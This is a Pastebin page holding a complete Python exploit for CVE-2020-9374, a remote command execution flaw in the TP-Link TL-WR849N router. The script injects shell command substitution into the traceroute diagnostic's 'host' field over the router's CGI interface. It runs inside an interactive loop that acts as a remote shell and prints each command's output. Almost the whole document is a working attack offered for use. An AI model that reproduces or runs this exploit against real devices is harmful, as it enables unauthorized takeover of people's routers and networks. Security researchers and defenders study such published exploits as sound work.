FlyFar

TP LINK TL-WR849N - Remote Code Execution - CVE-2020-9374

Feb 14th, 2024
92
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 1.92 KB | Cybersecurity | 0 0
  1. # Exploit Title: TP LINK TL-WR849N - Remote Code Execution
  2. # Date: 2019-11-20
  3. # Exploit Author: Elber Tavares
  4. # Vendor Homepage: https://www.tp-link.com/
  5. # Software Link: https://www.tp-link.com/br/support/download/tl-wr849n/#Firmware
  6. # Version: TL-WR849N 0.9.1 4.16
  7. # Tested on: linux, windows
  8. # CVE : CVE-2020-9374
  9.  
  10. import requests
  11.  
  12. def output(headers,cookies):
  13.     url = 'http://192.168.0.1/cgi?1'
  14.     data = ''
  15.     data += '[TRACEROUTE_DIAG#0,0,0,0,0,0#0,0,0,0,0,0]0,3\x0d\x0a'
  16.     data += 'diagnosticsState\x0d\x0a'
  17.     data += 'X_TP_HopSeq\x0d\x0a'
  18.     data += 'X_TP_Result\x0d\x0a'
  19.     r = requests.post(url,data=data,headers=headers,cookies=cookies)
  20.     saida = r.text
  21.     filtro = saida.replace(': Name or service not known','')
  22.     filtro = filtro.replace('[0,0,0,0,0,0]0','')
  23.     filtro = filtro.replace('diagnosticsState=','')
  24.     filtro = filtro.replace('X_TP_HopSeq=0','')
  25.     filtro = filtro.replace('X_TP_Result=','')
  26.     print(filtro[:-8])
  27.  
  28. def aceppt(headers,cookies):
  29.     url = 'http://192.168.0.1/cgi?7'
  30.     data = '[ACT_OP_TRACERT#0,0,0,0,0,0#0,0,0,0,0,0]0,0\x0d\x0a'
  31.     r = requests.post(url,data=data,headers=headers,cookies=cookies)
  32.     output(headers,cookies)
  33.    
  34. def inject(command,headers,cookies):
  35.     url = 'http://192.168.0.1/cgi?2'
  36.     data = ''
  37.     data += '[TRACEROUTE_DIAG#0,0,0,0,0,0#0,0,0,0,0,0]0,8\x0d\x0a'
  38.     data += 'maxHopCount=20\x0d\x0a'
  39.     data += 'timeout=5\x0d\x0a'
  40.     data += 'numberOfTries=1\x0d\x0a'
  41.     data += 'host="$('+command+')"\x0d\x0a'
  42.     data += 'dataBlockSize=64\x0d\x0a'
  43.     data += 'X_TP_ConnName=ewan_pppoe\x0d\x0a'
  44.     data += 'diagnosticsState=Requested\x0d\x0a'
  45.     data += 'X_TP_HopSeq=0\x0d\x0a'
  46.     r = requests.post(url,data=data,headers=headers,cookies=cookies)
  47.     aceppt(headers,cookies)
  48.  
  49. def main():
  50.     cookies = {“Authorization”: “Basic REPLACEBASE64AUTH”}
  51.     headers = {'Content-Type': 'text/plain',
  52.     'Referer': 'http://192.168.0.1/mainFrame.htm'}
  53.     while True:
  54.         command = input('$ ')
  55.         inject(command,headers,cookies)
  56.  
  57. main()
Add Comment
Please, Sign In to add comment